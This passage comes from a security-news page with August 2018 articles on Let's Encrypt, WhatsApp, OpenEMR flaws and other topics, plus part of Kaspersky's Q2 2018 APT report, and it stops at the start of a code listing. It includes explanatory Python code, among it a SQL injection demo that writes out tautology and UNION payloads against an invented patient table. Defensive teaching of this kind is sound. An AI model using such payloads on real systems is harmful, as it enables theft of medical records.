Created by the Internet Security Research Group (ISRG) as an effort to drive HTTPS adoption, the initiative launched publicly in December 2015 and came out of beta in April 2016.

At the end of July 2018, Let’s Encrypt received direct trust from Microsoft products, which resulted in it being trusted by all major root programs. The CA’s certificates are cross-signed by IdenTrust, and have been widely trusted since the beginning.

“Browsers and operating systems have not, by default, directly trusted Let’s Encrypt certificates, but they trust IdenTrust, and IdenTrust trusts us, so we are trusted indirectly. IdenTrust is a critical partner in our effort to secure the Web, as they have allowed us to provide widely trusted certificates from day one,” noted Josh Aas, Executive Director of ISRG.

Now, the CA’s root is directly trusted by almost all newer versions of operating systems, browsers, and devices. Many older versions, however, still do not directly trust Let’s Encrypt.

While some of these are expected to be updated to trust the CA, others won’t, and it might take at least five more years until most of them cycle out of the Web ecosystem. Until that happens, Let’s Encrypt will continue to use a cross signature.

“Let’s Encrypt is currently providing certificates for more than 115 million websites. We look forward to being able to serve even more websites as efforts like this make deploying HTTPS with Let’s Encrypt even easier,” Aas concludes.
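The trust arithmetic described above (a client that does not know ISRG Root X1 can still validate a Let's Encrypt certificate as long as the chain it receives runs through the IdenTrust cross-signature) is easy to make concrete. The following is an added, simplified model written for this page, not Let's Encrypt or ISRG code: certificates are reduced to subject/issuer name pairs and path building is plain name chaining, with no signature, validity or constraint checks. The intermediate name "Let's Encrypt Authority X3", the IdenTrust root name "DST Root CA X3" and the site "example.org" are assumptions of the example; the page itself names only ISRG Root X1 and IdenTrust.

```python
"""Certificate path building with a cross-signed intermediate.
Added, simplified model (name matching only, no signatures); not Let's Encrypt code."""
from collections import namedtuple

Cert = namedtuple("Cert", "subject issuer")

# Names as of 2018. The page names ISRG Root X1 and IdenTrust; "DST Root CA X3"
# (IdenTrust's root) and "Let's Encrypt Authority X3" are assumed here.
ISRG_ROOT = Cert("ISRG Root X1", "ISRG Root X1")
DST_ROOT = Cert("DST Root CA X3", "DST Root CA X3")
X3_DIRECT = Cert("Let's Encrypt Authority X3", "ISRG Root X1")     # issued by ISRG
X3_CROSS = Cert("Let's Encrypt Authority X3", "DST Root CA X3")    # cross-signed
LEAF = Cert("example.org", "Let's Encrypt Authority X3")           # hypothetical site


def trust_store(*roots):
    """A client's root program: self-signed roots keyed by subject name."""
    return {root.subject: root for root in roots}


def build_paths(leaf, pool, store, max_depth=5):
    """All issuer paths from `leaf`, through certificates in `pool` (what the
    server sent or the client has cached), to a root in `store`, shortest
    first. Real validators also check signatures, validity periods, key usage
    and name constraints; this model stops at subject/issuer name chaining."""
    paths = []

    def walk(cert, path):
        if cert.issuer in store:
            paths.append(path + [store[cert.issuer]])
            return
        if len(path) >= max_depth:
            return
        for cand in pool:
            # `cand not in path` guards against loops between cross-signed CAs
            if cand.subject == cert.issuer and cand not in path:
                walk(cand, path + [cand])

    walk(leaf, [leaf])
    return sorted(paths, key=len)


def validates(leaf, pool, store):
    """True when at least one path to a trusted root exists."""
    return bool(build_paths(leaf, pool, store))


if __name__ == "__main__":
    old_client = trust_store(DST_ROOT)             # older device: IdenTrust only
    new_client = trust_store(ISRG_ROOT, DST_ROOT)  # current device: both roots
    for label, pool in (("cross-signed X3 served", [X3_CROSS]),
                        ("direct X3 served", [X3_DIRECT])):
        for name, store in (("old", old_client), ("new", new_client)):
            print(f"{label:24} {name} client: {validates(LEAF, pool, store)}")
```

The four printed cases show the operational reason for keeping the cross-signature: a server that switched to serving only the ISRG-issued intermediate would break every client whose store still lacks ISRG Root X1, while serving the cross-signed intermediate validates on both old and new clients.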

Researchers Find Flaw in WhatsApp
8.8.2018 securityweek

Researchers at Israeli cybersecurity firm Check Point said Wednesday they had found a flaw in WhatsApp that could allow attackers to modify and send fake messages in the popular messaging app.

Check Point said the vulnerability gives an attacker the possibility "to intercept and manipulate messages sent by those in a group or private conversation" as well as "create and spread misinformation".

The report of the flaw comes as the Facebook-owned app is coming under increasing scrutiny as a means of spreading misinformation, owing to its popularity and the ease of forwarding messages to groups.

Last month, the app announced limits on forwarding messages after the Indian government threatened to take action following the killing of more than 20 people by mobs, after the victims had been accused of child kidnapping and other crimes in viral messages circulated on WhatsApp.

WhatsApp said in a statement: "We carefully reviewed this issue and it's the equivalent of altering an email to make it look like something a person never wrote."

However, WhatsApp said: "This claim has nothing to do with the security of end-to-end encryption, which ensures only the sender and recipient can read messages sent on WhatsApp."

The app noted it recently placed a limit on forwarding content, added a label to forwarded messages, and made a series of changes to group chats in order to tackle the challenge of misinformation.

Founded in 2009 and purchased by Facebook in 2014, WhatsApp said that at the beginning of the year it had more than 1.5 billion users who exchanged 65 billion messages per day.

NERC Names Bill Lawrence as VP, Chief Security Officer
8.8.2018 securityweek Security

North American Electric Reliability Corporation (NERC) on Tuesday announced that Bill Lawrence has been named vice president and chief security officer (CSO), and will officially step into the lead security role on August 16, 2018.

In his new role, Lawrence will be tasked with heading NERC's security programs executed through the Electricity Information Sharing and Analysis Center (E-ISAC), where he currently serves as senior director. He will also be responsible for directing security risk assessments and mitigation initiatives to protect critical electricity infrastructure across North America, the regulatory authority said.


As VP and CSO, Lawrence will also lead coordination efforts with government agencies and stakeholders on cyber and physical security matters, including analysis, response and sharing of critical sector information, NERC said.

Lawrence joined NERC in July 2012 and has directed the development of NERC’s grid security exercise, GridEx.

A not-for-profit international regulatory authority formed to reduce risks to the reliability and security of the grid, NERC's jurisdiction includes owners and operators that serve more than 334 million people.

Lawrence is a graduate of the U.S. Naval Academy with a bachelor’s degree in Computer Science, and flew F-14 Tomcats and F/A-18F Super Hornets for the U.S. Navy prior to joining NERC. He holds a master’s degree in International Relations from Auburn Montgomery and a master’s degree in Military Operational Art and Science from the Air Command and Staff College.

NERC is subject to oversight by the Federal Energy Regulatory Commission (FERC) and governmental authorities in Canada.

Enterprises: Someone on Your Security Team is Likely a Grey Hat Hacker
8.8.2018 securityweek Security

Companies Should Not Dismiss a Bit of Grey Hatting by Staff as Just a Form of Letting Off Steam

The cost of cybercrime is normally described as direct costs: the cost of remediation, forensic support, legal costs and compliance fines, etcetera. A new survey has sought to take a slightly different approach, looking at the organizational costs associated with cybercriminal activity.

Sponsored by Malwarebytes, Osterman Research surveyed 900 security professionals during May and June 2018 across five countries: the United States (200), UK (175), Germany (175), Australia (175), and Singapore (175). All respondents were employed either managing or working on cybersecurity issues in an organization of between 200 and 10,000 employees.

The survey (PDF) relates staff salaries, security budgets and remediation costs, and concludes that the average firm employing 2,500 staff in the U.S. can expect to spend more than $2 million per year on cybersecurity-related costs. The amount is lower in the other surveyed countries, but still close to, or above, $1 million per year. Interestingly, the survey took the unusual step of checking whether there is any correlation between the number of grey hats employed by a firm and the overall cost of cybersecurity.

The basic findings are much as we would expect, and have been confirmed by numerous other research surveys: most companies have been breached; phishing is the most common attack vector; mid-market companies are attacked more frequently than small companies and as frequently as large companies; and attacks occur with alarming frequency.

The most surprising revelation from this survey is the number of grey hats working within organizations, and black hats that have been employed by organizations. Grey hats are defined as computer security experts who may sometimes violate laws or typical ethical standards, but do not have the full malicious intent associated with a full-time black hat hacker.

Overall, the 900 respondents believe that 4.6% of their colleagues are grey hats -- or, as the report puts it, full-time security professionals who are black hats on the side. This varies by country: 3.4% in Germany, Australia and Singapore, 5.1% in the U.S., and as much as 7.9% in the UK.

Motivations provided by the respondents include black hat activity being more lucrative (63%), the challenge (50%), retaliation against an employer (40%), philosophical reasons (39%), and a belief that it is not really wrong (34%).

The extent of the income differential between a white hat employee and a black hat hacker is confirmed in a separate report from Bromium, published in April 2018: "High-earning cybercriminals can make $166,000+ per month; Middle-earners can make $75,000+ per month; Low-earners can make $3,500+ per month."

According to the Malwarebytes survey, the highest average starting salary for security professionals (in the U.S.) is $65,578 or just $5,464 per month (compared to $75,000 for middle-earning black hats). The difference is far greater in the UK, where the average starting salary for security professionals is less than $3,000 per month.

"It's interesting," Jerome Segura, lead malware intelligence analyst at Malwarebytes told SecurityWeek: "that despite the skills shortage, when companies hire new security staff, they generally don't pay them very much. There's kind of a contrast here, where companies and governments claim it's difficult to find the right people -- but when they do hire people they don't always pay them accordingly."

There appears to be an inevitable conclusion when correlating figures between the U.S. and the U.K. Not only do the U.S. companies pay their security staff much more than UK companies, they also have a considerably higher security budget ($1,573,197 in the U.S. compared to $350,157 in the UK). Can it be simply coincidence that the UK then has a higher percentage of grey hats within their companies, and that the cost of remediation is proportionately higher (14.7% of the security budget in the U.S., and 17.0% in the UK)?

It makes sense that remediation would take up a higher percentage of a small budget -- and it is tempting to think that the higher rewards of black-hattery would be attractive to lowly paid British staff. The U.S. government believes it has found an example in Marcus Hutchins, the British researcher who found and triggered the 'kill-switch' in WannaCry. That was pure white hat behavior -- but Hutchins was later arrested in the US and accused of involvement in making and distributing the Kronos banking malware.

"Hutchins has many who support him," commented Segura, "and many who don't. But given the surprising number of employed white hats who are considered by their peers to be grey hats, it will be interesting to see how this turns out."

Segura accepts that comparatively low pay in the industry could be a partial cause for the surprisingly high number of grey hats working in infosec. He points out that the highest percentage of grey hats appears to work for mid-size companies that cannot afford the highest salaries, and which predominate in the UK. But he does not believe that finance is the only motivating factor. "There is a tricky line in the security profession," he told SecurityWeek. "Some people are pure hackers in the original non-malevolent sense, and they like to poke around to understand things better -- even if it is strictly speaking illegal. It also helps the job -- by peeking behind the curtain you get a better understanding of how the criminals operate and you can better defend against them."

But there's more. "Don't forget the social issues," he added. "Techies can be socially awkward and have difficulty in fitting into a corporate structure. The nerd in his bedroom is a bit of a cliche, but there is some truth to it. Working in a business corporate environment is not for everybody. And in infosec there is a lot of pressure. You can't fit the work into 9-to-5, five days a week -- so people work up to 80 hours or more per week without getting recompensed for it. That's a lot of mental pressure -- there's a lot of burnout in infosec. It's tough, but that's the reality. If you're in infosec, you're on call 24/7."

It would be wrong for companies to dismiss a bit of grey hatting by staff as just a form of letting off steam -- that could prove disastrous. But at the same time, the onus is on the employer to find the solution. Companies probably cannot compete with black hats financially -- but they should do as much as possible to be as inclusive and supportive as possible to the pressures of working in infosec.

New Law May Force Small Businesses to Reveal Data Practices
8.8.2018 securityweek Security

NEW YORK (AP) — A Rhode Island software company that sells primarily to businesses is nonetheless making sure it complies with a strict California law about consumers' privacy.

AVTECH Software is preparing for what some say is the wave of the future: laws requiring businesses to be upfront with customers about how they use personal information. California has already passed a law requiring businesses to disclose what they do with people's personal information and giving consumers more control over how their data is used — even the right to have it deleted from companies' computers.

Privacy rights have gotten more attention since news earlier this year that the data firm Cambridge Analytica improperly accessed Facebook user information. New regulations also took effect in Europe.

For AVTECH, which makes software to control building environmental issues, preparing now makes sense not only to lay the groundwork for future expansion, but to reassure customers increasingly uneasy about what happens to their personal information.

"People will look at who they're dealing with and who they're making purchases from," says Russell Benoit, marketing manager for the Warren, Rhode Island-based company.

Aware that California was likely to enact a data law, AVTECH began reviewing how it handles customer information last year. Although most of the company's customers are businesses, it expects it will increase its sales to consumers.

While it may yet face legal challenges, the California Consumer Privacy Act is set to take effect Jan. 1, 2020. It covers companies that conduct business in California and that fit one of three categories: Those with revenue above $25 million; those that collect or receive the personal information of 50,000 or more California consumers, households or electronic devices; and those who get at least half their revenue from selling personal information.

Although many small businesses may be exempt, those subject to the law will have to ensure their systems and websites can comply with consumer inquiries and requests. That may be an added cost of thousands for small companies that don't have in-house technology staffers and need software and consulting help.

Under California's law, consumers have the right to know what personal information companies collect from them, why it's collected and who the businesses share, transfer or sell it to. That information includes names, addresses, email addresses, browsing histories, purchasing histories, professional or employment information, educational records and information about travel from GPS apps and programs. Companies must give consumers at least two ways to find out their information, including a toll-free phone number and an online form, and companies must also give consumers a copy of the information they've collected.

Consumers also have the right to have their information deleted from companies' computer systems, and to opt out of having the information sold or shared.

The law was modeled on the European Union's General Data Protection Regulation, which took effect May 25. The California Legislature passed its law to prevent a more stringent proposed law from being placed on the November election ballot.

Frank Samson hopes the California law will help prevent what he sees as troubling marketing tactics by some in his industry, taking care of senior citizens. When people inquire about senior care companies online, it's sometimes on sites run by brokers rather than care providers themselves.

"It may be in the fine print, or it may not be: We're going to be taking your info and sending it out to a bunch of people," says Samson, founder of Petaluma, California-based Senior Care Authority.

That steers many would-be clients to just a handful of companies, he says, and can mean seniors and families get bombarded with calls while dealing with stressful situations.

But many unknowns remain about the California law. The state attorney general's office must write regulations to accompany several provisions. There are inconsistencies between different sections of the law, and the Legislature would need to correct them, says Mark Brennan, an attorney with Hogan Lovells in Washington, D.C., who specializes in technology and consumer protection laws. Questions about the law might need to be litigated, including whether California can force businesses based in other states to comply, Brennan says. There are similar questions about the European GDPR.

In the meantime, small business owners who want to start figuring out if they're likely to be subject to the California law and GDPR can talk to attorneys and technology consultants who deal with privacy rights. Brennan suggests companies contact professional and industry organizations that are gathering information about the laws and how to comply.

Some small businesses may benefit, such as any developing software tied to the law. Among other things, the software is designed to allow companies and customers to see what information has been gathered, who has access to it and who it has been shared with.

The software, expected to stay free for consumers, could cost companies into the thousands of dollars a year depending on their size, says Andy Sambandam, CEO of Clarip, one of the software makers. But, he says, "over time, the price is going to come down."

And other states are expected to adopt similar laws.

"This is the direction the country is going in," says Campbell Hutcheson, chief compliance officer with Datto, an information technology firm.

RiskRecon Raises $25 Million to Grow Third-Party Cyber Risk Management Business
8.8.2018 securityweek Cyber

Salt Lake City-based RiskRecon, which offers solutions to help companies manage third-party cyber risk, has raised $25 million in Series B financing, the company announced Wednesday.

The Series B round brings the total amount raised by RiskRecon to more than $40 million.

RiskRecon helps its customers control third-party risk by providing assessments of each third-party’s security practices, which can be used to establish a base level of trust and identify specific areas for further discussion and investigation.

The company, which has nearly tripled its customer base in the last twelve months, says the additional funding will be used to support increasing demand for its third-party cyber risk management solutions.

“Though most businesses have no choice but to obtain internet services, security solutions, and a range of other business-critical technologies from third-party providers, they do have a choice in how they manage the associated security risks,” noted SecurityWeek contributor Josh Lefkowitz in a recent column.

“Third-party risk management is the process of holding enterprises accountable to good security practices,” explained Kelly White, RiskRecon’s CEO and Co-founder. “As you improve the risk management of your third parties, you improve the collective security of the Internet.”

The Series B round was led by Accel and joined by existing investors Dell Technologies Capital, General Catalyst, and Fidelity’s F-Prime Capital. Several existing individual investors also participated in the round.

“As we talk to our CISOs, we see a growing need for third-party risk management as enterprises have become more intertwined with third-party service providers,” said Nate Niparko, a partner at Accel.

“Conducting thorough due diligence on a prospective vendor’s security is essential,” Lefkowitz added in his April 2018 column. “The most secure and successful vendor relationships are rooted in preparation and transparency. Thoroughly understanding all facets of a vendor’s security program, implementing additional controls as needed to appropriately safeguard your business’s assets, and being prepared to respond to future incidents can go a long way toward reducing business risks associated with any vendor relationship.”

Serious OpenEMR Flaws Expose Medical Records
8.8.2018 securityweek

Researchers have discovered nearly two dozen vulnerabilities in the OpenEMR software, including critical flaws that can be exploited to gain unauthorized access to medical records.

OpenEMR is a highly popular open source management software for health records and medical practices. The free application offers a wide range of features and it can run on various operating systems, including Windows, Linux and macOS.

Researchers at Project Insecurity, which provides penetration testing, vulnerability assessment and other cybersecurity services, conducted a detailed analysis of the OpenEMR source code. The analysis combined manual source code review with testing in Burp Suite, and it led to the discovery of 23 flaws.

Fifteen of the security holes have been rated “high severity.” These include an authentication bypass issue that allows an attacker to access the patient portal, SQL injection flaws, remote command execution bugs, and arbitrary file read/write issues.

The authentication bypass vulnerability can be exploited by an unauthenticated attacker by navigating to the patient registration page and then modifying the URL to access pages that would normally require authentication, including ones storing patient data.

Experts discovered a total of nine SQL injection vulnerabilities, including ones that provide access to databases storing sensitive information. Exploiting the SQL injection flaws requires authentication, but that can be achieved using the aforementioned security bypass.
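As a generic illustration of the vulnerability class reported above, and not code taken from OpenEMR or from the Project Insecurity report, the following added example puts a string-built patient lookup next to its parameterized form and runs two typical injection payloads through both. The schema, the rows and the `patient_data` table name are constructed for the example; it uses Python's bundled sqlite3 so it runs offline.

```python
"""String-built vs. parameterized patient lookup (added illustration of the
SQL injection class; not OpenEMR code, schema and rows are constructed)."""
import sqlite3


def make_db():
    """In-memory table loosely shaped like an EMR patient record; the rows
    are invented sample data."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE patient_data (pid INTEGER, fname TEXT, lname TEXT, ss TEXT)")
    db.executemany("INSERT INTO patient_data VALUES (?, ?, ?, ?)", [
        (1, "Alice", "Archer", "000-00-0001"),
        (2, "Bob", "Baker", "000-00-0002"),
        (3, "Carol", "Clark", "000-00-0003"),
    ])
    return db


def lookup_vulnerable(db, lname):
    """The search term is spliced into the SQL text, so quote characters in it
    become part of the statement's grammar."""
    sql = "SELECT pid, fname, lname FROM patient_data WHERE lname = '" + lname + "'"
    return db.execute(sql).fetchall()


def lookup_safe(db, lname):
    """The term travels as a bound parameter: it is always data, whatever it
    contains, and the statement's shape is fixed before the value is seen."""
    sql = "SELECT pid, fname, lname FROM patient_data WHERE lname = ?"
    return db.execute(sql, (lname,)).fetchall()


# Two payloads of the kind a tester would try in a search field: the first
# widens the WHERE clause to every row, the second pulls a column (ss) that
# the original query never exposed.
TAUTOLOGY = "' OR '1'='1"
UNION_SSN = "x' UNION SELECT pid, ss, lname FROM patient_data --"

if __name__ == "__main__":
    db = make_db()
    for term in ("Baker", TAUTOLOGY, UNION_SSN):
        print(repr(term))
        print("  vulnerable:", lookup_vulnerable(db, term))
        print("  safe      :", lookup_safe(db, term))
```

The safe variant returns nothing for both payloads because no patient has a surname equal to the literal payload string; that is the behaviour to look for when retesting a fix, rather than an error message, which can itself leak query structure.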

Four remote command execution flaws have been identified by experts, but they all require authentication, including admin privileges in some cases.

Researchers also found vulnerabilities that can be exploited to upload, read or delete files on the system. Exploitation requires authentication, but their impact can be high.

According to Project Insecurity, OpenEMR is affected by several cross-site request forgery (CSRF) vulnerabilities. In some cases, these flaws can be exploited to escalate privileges and execute arbitrary code if the attacker can convince an administrator to click on a malicious link.

The other vulnerabilities discovered by Project Insecurity include unrestricted file upload, information disclosure and other issues classified as medium or low severity.

Project Insecurity has published a 28-page report detailing each of the flaws, including impact, cause, and proof-of-concept (PoC) code. The report also shares recommendations on how the security holes can be addressed.

The vulnerabilities were reported to OpenEMR developers on July 7 and patches were rolled out for all the bugs within roughly two weeks.

IT threat evolution Q2 2018
8.8.2018 Kaspersky CyberSpy

Targeted attacks and malware campaigns
Operation Parliament
In April, we reported the workings of Operation Parliament, a cyber-espionage campaign aimed at high-profile legislative, executive and judicial organizations around the world – with its main focus in the MENA (Middle East and North Africa) region, especially Palestine. The attacks, which started early in 2017, target parliaments, senates, top state offices and officials, political science scholars, military and intelligence agencies, ministries, media outlets, research centers, election commissions, Olympic organizations, large trading companies and others.

The attackers have taken great care to stay under the radar, imitating another attack group in the region. The targeting of victims is unlike that of previous campaigns in the Middle East, by Gaza Cybergang or Desert Falcons, and points to an elaborate information-gathering exercise that was carried out prior to the attacks (physical and/or digital). The attackers have been particularly careful to verify victim devices before proceeding with the infection, safeguarding their C2 (Command-and-Control) servers. The attacks seem to have slowed down since the start of 2018, probably after the attackers achieved their objectives.

The malware basically provides a remote CMD/PowerShell terminal for the attackers, enabling them to execute any scripts or commands and receive the result via HTTP requests.

This campaign is a further symptom of escalating tensions in the Middle East.

Energetic Bear
Crouching Yeti (aka Energetic Bear) is an APT group that has been active since at least 2010, mainly targeting energy and industrial companies. The group targets organizations around the world, but with a particular focus on Europe, the US and Turkey – the latter being a new addition to the group’s interests during 2016-17. The group’s main tactics include sending phishing e-mails with malicious documents and infecting servers for different purposes, including hosting tools and logs and watering-hole attacks. Crouching Yeti’s activities against US targets have been publicly discussed by US-CERT and the UK National Cyber Security Centre (NCSC).

In April, Kaspersky Lab ICS CERT provided information on identified servers infected and used by Crouching Yeti and presented the findings of an analysis of several web servers compromised by the group during 2016 and early 2017.

Our findings are as follows.

With rare exceptions, the group’s members get by with publicly available tools. The use of publicly available utilities by the group to conduct its attacks renders the task of attack attribution without any additional group ‘markers’ very difficult.
Potentially, any vulnerable server on the internet is of interest to the attackers when they want to establish a foothold in order to develop further attacks against target facilities.
In most cases that we have observed, the group performed tasks related to searching for vulnerabilities, gaining persistence on various hosts, and stealing authentication data.
The diversity of victims may indicate the diversity of the attackers’ interests.
It can be assumed with some degree of certainty that the group operates in the interests of or takes orders from customers that are external to it, performing initial data collection, the theft of authentication data and gaining persistence on resources that are suitable for the attack’s further development.
You can read the full report here.

ZooPark
The use of mobile platforms for cyber-espionage has been growing in recent years – not surprising, given the widespread use of mobile devices by businesses and consumers alike. ZooPark is one such operation. The attackers have been focusing on targets in the Middle East since at least June 2015, using several generations of malware to target Android devices, which we have labelled versions one to four.

Each version marks a progression – from very basic first and second versions, to the commercial spyware fork in the third version and then to the complex spyware that is the fourth version. The last step is especially interesting, showing a big leap from straightforward code functionality to highly sophisticated malware.

This suggests that the latest version may have been bought from a vendor of specialist surveillance tools. This wouldn’t be surprising, since the market for these espionage tools is growing, becoming popular among governments, with several known cases in the Middle East. At this point, we cannot confirm attribution to any known threat actor. If you would like to learn more about our intelligence reports, or request more information on a specific report, contact us at intelreports@kaspersky.com.

We have seen two main distribution vectors for ZooPark – Telegram channels and watering-holes. The second of these has been the preferred method: we found several news websites that have been hacked by the attackers to redirect visitors to a downloading site that serves malicious APKs. Some of the themes observed in the campaign include ‘Kurdistan referendum’, ‘TelegramGroups’ and ‘Alnaharegypt news’, among others.

The target profile has evolved in the last few years of the campaign, focusing on victims in Egypt, Jordan, Morocco, Lebanon and Iran.

Some of the samples we have analyzed provide clues about the intended targets. For example, one sample mimics a voting application for the independence referendum in Kurdistan. Other possible high-profile targets include the United Nations Relief and Works Agency (UNRWA) for Palestine refugees in the Near East in Amman, Jordan.

The king is dead, long live the king!
On April 18, someone uploaded an interesting exploit to VirusTotal. This was detected by several security vendors, including Kaspersky Lab – using our generic heuristic logic for some older Microsoft Word documents.

This turned out to be a new zero-day vulnerability in Internet Explorer (CVE-2018-8174), patched by Microsoft on May 8, 2018. After processing the sample in our sandbox system, we noticed that it successfully exploited a fully patched version of Microsoft Word. This led us to carry out a deeper analysis of the vulnerability.

The infection chain consists of the following steps. The victim receives a malicious Microsoft Word document. After opening it, the second stage of the exploit is downloaded – an HTML page containing VBScript code. This triggers a UAF (Use After Free) vulnerability and executes shellcode.

Despite the initial attack vector being a Word document, the vulnerability is actually in VBScript. This is the first time we have seen a URL Moniker used to load an IE exploit in Word, but we believe that this technique will be heavily abused by attackers in the future, since it allows them to force victims to load IE, ignoring the default browser settings. It’s likely that exploit kit authors will start abusing it in both drive-by attacks (through the browser) and spear-phishing campaigns (through a document).

To protect against this technique, we would recommend applying the latest security updates and using a security solution with behavior detection capabilities.
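One static check that follows from the description above: a Word document that forces the IE engine to load a remote page does so through an OLE object whose class is the standard URL moniker, and the CLSID of that class (CLSID_StdURLMoniker, 79EAC9E0-BAF9-11CE-8C82-00AA004BA90B) is a fixed byte pattern in the document. The scanner below is an added example written for this page, not Kaspersky's detection logic; the only facts it relies on are that CLSID, the little-endian serialization of the first three GUID fields, and the fact that RTF stores OLE payloads as hex text while OOXML stores them as zip members. The sample documents it builds are constructed for the test and are not exploit files.

```python
"""Scan documents for an embedded URL moniker CLSID (added detection example)."""
import io
import re
import uuid
import zipfile

# CLSID_StdURLMoniker: the COM class an OLE container instantiates to fetch a
# remote resource on the document's behalf.
URL_MONIKER_CLSID = uuid.UUID("79EAC9E0-BAF9-11CE-8C82-00AA004BA90B")

# Serialized CLSIDs store the first three fields little-endian, so the bytes on
# disk are not in printed order; UUID.bytes_le produces the on-disk form.
URL_MONIKER_RAW = URL_MONIKER_CLSID.bytes_le       # e0 c9 ea 79 f9 ba ce 11 ...

# RTF carries OLE payloads as hex text in \objdata, often wrapped across lines,
# so the same 16 bytes must also be matched as hex after whitespace removal.
URL_MONIKER_HEX = re.compile(re.escape(URL_MONIKER_RAW.hex().encode()), re.IGNORECASE)


def find_url_monikers(blob):
    """Return (encoding, offset) pairs; 'hex' offsets refer to the
    whitespace-stripped copy of the input."""
    hits = [("raw", m.start()) for m in re.finditer(re.escape(URL_MONIKER_RAW), blob)]
    compact = re.sub(rb"\s+", b"", blob)
    hits += [("hex", m.start()) for m in URL_MONIKER_HEX.finditer(compact)]
    return hits


def scan_document(data):
    """Map member name -> hits. OOXML (.docx) is a zip, so each member is
    inflated and scanned separately: deflate would hide the pattern in the
    container bytes. Anything else is scanned as a flat blob."""
    results = {}
    if data[:4] == b"PK\x03\x04":
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            for name in z.namelist():
                hits = find_url_monikers(z.read(name))
                if hits:
                    results[name] = hits
    else:
        hits = find_url_monikers(data)
        if hits:
            results["<blob>"] = hits
    return results


def build_samples():
    """Constructed inputs for demonstration only; none is a real exploit document."""
    ole_member = b"\x00" * 32 + URL_MONIKER_RAW + b"http://example.invalid/stage2.html\x00"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/embeddings/oleObject1.bin", ole_member)
    docx = buf.getvalue()
    hexrun = URL_MONIKER_RAW.hex().upper().encode()
    rtf = (b"{\\rtf1{\\object\\objdata 01050000\r\n"
           + hexrun[:16] + b"\r\n" + hexrun[16:] + b"\r\n}}")   # hex split over lines
    clean = b"{\\rtf1 Nothing embedded here}"
    return docx, rtf, clean


if __name__ == "__main__":
    for label, doc in zip(("docx", "rtf", "clean"), build_samples()):
        print(label, scan_document(doc))
```

A hit is a triage signal, not a verdict: legitimate documents can embed linked objects too, so the next step is to extract the object and look at the URL it carries and whether it points to HTML rather than a document.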

VPNFilter
In May, researchers from Cisco Talos published the results of their investigation into VPNFilter, malware used to infect different brands of routers – mainly in Ukraine, although affecting routers in 54 countries in total. Initially, they believed that the malware had infected around 500,000 devices – Linksys, MikroTik, Netgear and TP-Link networking equipment in the small office/home office (SOHO) sector, and QNAP network-attached storage (NAS) devices. However, it later became clear that the list of affected device models was much longer – 75 in total, including models from ASUS, D-Link, Huawei, Ubiquiti, UPVEL and ZTE.

The malware is capable of bricking the infected device, executing shell commands for further manipulation, creating a TOR configuration for anonymous access to the device or configuring the router’s proxy port and proxy URL to manipulate browsing sessions.

Further research by Cisco Talos showed that the malware is able to infect more than just the targeted devices: it can also spread into the networks behind an infected device, thereby extending the scope of the attack. Researchers also identified a new stage-three module capable of injecting malicious code into web traffic.

The C2 mechanism has several stages. First, the malware tries to visit a number of gallery pages hosted on ‘photobucket[.]com’ and fetches the image from the page. If this fails, the malware tries to fetch an image from the hard-coded domain ‘toknowall[.]com’ (this C2 domain is currently sink-holed by the FBI). If this fails also, the malware goes into passive backdoor mode, in which it processes network traffic on the infected device, waiting for the attacker’s commands. Researchers in the Global Research and Analysis Team (GReAT) at Kaspersky Lab analyzed the EXIF processing mechanism.

One of the interesting questions is who is behind this malware. Cisco Talos indicated that a state-sponsored or state affiliated threat actor is responsible. In its affidavit for sink-holing the C2, the FBI suggests that Sofacy (aka APT28, Pawn Storm, Sednit, STRONTIUM, and Tsar Team) is the culprit. There is some code overlap with the BlackEnergy malware used in previous attacks in Ukraine (the FBI’s affidavit makes it clear that they see BlackEnergy (aka Sandworm) as a sub-group of Sofacy).

LuckyMouse
In March 2018, we detected an ongoing campaign targeting a national data center in Central Asia. The choice of target of the campaign, which has been active since autumn 2017, is especially significant – it means that the attackers were able to gain access to a wide range of government resources in one fell swoop. We think they did this by inserting malicious scripts into the country’s official websites in order to conduct watering-hole attacks.

We attribute this campaign to the Chinese-speaking threat actor LuckyMouse (aka EmissaryPanda and APT27) because of the tools and tactics used in the campaign, because the C2 domain, update.iaacstudio[.]com, was previously used by this group and because they have previously targeted government organizations, including those in Central Asia.

The initial infection vector used in the attack against the data center is unclear. Even where we observed LuckyMouse using weaponized documents with CVE-2017-11882 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors since December 2017), we couldn’t prove that they were related to this particular attack. It’s possible that the attackers used a watering hole to infect data center employees.

The attackers used the HyperBro Trojan as their last-stage, in-memory remote administration tool (RAT); their anti-detection launcher and decompressor make extensive use of the Metasploit ‘shikata_ga_nai’ encoder as well as LZNT1 compression.

The main C2 used in this campaign is bbs.sonypsps[.]com, which resolved to an IP address in a Ukrainian ISP’s network, held by a MikroTik router running firmware version 6.34.4 (March 2016) with SMBv1 enabled. We suspect that this router was hacked as part of the campaign in order to process the malware’s HTTP requests.

The initial module drops three files that are typical for Chinese-speaking threat actors – a legitimate Symantec pcAnywhere file (‘intgstat.exe’) for DLL side-loading, a DLL launcher (‘pcalocalresloader.dll’) and the last-stage decompressor (‘thumb.db’). As a result of all these steps, the last-stage Trojan is injected into the process memory of ‘svchost.exe’.

The launcher module, obfuscated with the notorious Metasploit ‘shikata_ga_nai’ encoder, is the same for all the droppers. The resulting de-obfuscated code performs typical side-loading: it patches the pcAnywhere image in memory at its entry-point. The patched code jumps back to the second ‘shikata_ga_nai’ iteration of the decryptor, but this time as part of the white-listed application.

The Metasploit encoder obfuscates the last part of the launcher’s code, which in turn resolves the necessary API and maps ‘thumb.db’ into the memory of the same process (i.e. pcAnywhere). The first instructions in the mapped ‘thumb.db’ are a new iteration of ‘shikata_ga_nai’. The decrypted code resolves the necessary API functions, decompresses the embedded PE file with ‘RtlDecompressBuffer()’ using LZNT1 and maps it into memory.
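To recover the compressed last stage without a Windows box, here is an added example (my own code, not Kaspersky’s and not the attackers’ decompressor) of a pure-Python LZNT1 decoder that does what RtlDecompressBuffer() does with COMPRESSION_FORMAT_LZNT1. The input buffers are constructed by hand to exercise a stored chunk and a compressed chunk; they are not the HyperBro payload. The chunk layout assumed (2-byte chunk header, 16-bit copy tokens whose displacement/length split moves as the chunk fills) is the documented LZNT1 format.

```python
"""Decompress an LZNT1 buffer, the format RtlDecompressBuffer() handles on Windows.

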